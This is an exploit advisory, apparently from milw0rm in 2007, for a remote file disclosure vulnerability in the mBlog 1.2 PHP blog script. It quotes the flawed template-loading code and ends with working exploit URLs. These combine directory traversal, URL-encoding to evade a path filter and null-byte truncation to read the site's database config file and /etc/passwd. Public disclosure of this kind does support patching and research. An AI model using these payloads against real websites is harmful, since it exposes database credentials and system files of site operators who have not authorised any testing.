56 lines
No EOL
1.9 KiB
Text
56 lines
No EOL
1.9 KiB
Text
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|
: :
|
|
: vuln.: mBlog 1.2 Remote File Disclosure Vulnerability :
|
|
: script info and download: http://www.c97.net/dl/index.php?act=view&id=8 :
|
|
: no dork for s-kiddie [; :
|
|
: :
|
|
: author: irk4z[at]yahoo.pl :
|
|
: greets to: str0ke, wacky, wszystkich polaków ;] :
|
|
: :
|
|
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|
|
|
# code:
|
|
|
|
./includes/tpl.php, 41-56:
|
|
...
|
|
41 // load_tpl
|
|
42 // loding a template file into a varible.
|
|
43 // use quick_tpl to display template
|
|
44 function load_tpl ($path)
|
|
45 {
|
|
46 $tpl = '';
|
|
47 global $tpl_block;
|
|
48
|
|
49 if (substr ($path, -4) == '.tpl')
|
|
50 {
|
|
51 if (strpos (Cur_Url (), 'includes%2F') OR strpos (Cur_Url (), 'admin%2F') OR strpos (Cur_Url (), 'members%2F')) $path = '../'.$path;
|
|
52 if (!file_exists ($path)) die ("<B>Template $path not found! Contact webmaster.</B>");
|
|
53 $fp = fopen($path,'r');
|
|
54 while(!feof($fp)) $tpl .= fgets($fp,4096);
|
|
55 fclose ($fp);
|
|
56 }
|
|
...
|
|
|
|
load_tpl() 'loading a template file into a varible.' ;]
|
|
|
|
|
|
./index.php, 24-30:
|
|
...
|
|
24 // proses cmd
|
|
25 switch ($mode)
|
|
26 {
|
|
27 case 'page':
|
|
28 $txt['main_body'] = quick_tpl (load_tpl ($config['skin']."/$page.tpl"), 0);
|
|
29 flush_tpl ();
|
|
30 break;
|
|
...
|
|
|
|
file disclosure in $page :*
|
|
|
|
# exploit:
|
|
|
|
(%69%6E%63%6C%75%64%65%73 = includes)
|
|
http://[host]/[path]/index.php?mode=page&page=../../%69%6E%63%6C%75%64%65%73/db_config.php%00
|
|
http://[host]/[path]/index.php?mode=page&page=../../../../../../../../etc/passwd%00
|
|
|
|
# milw0rm.com [2007-12-21] |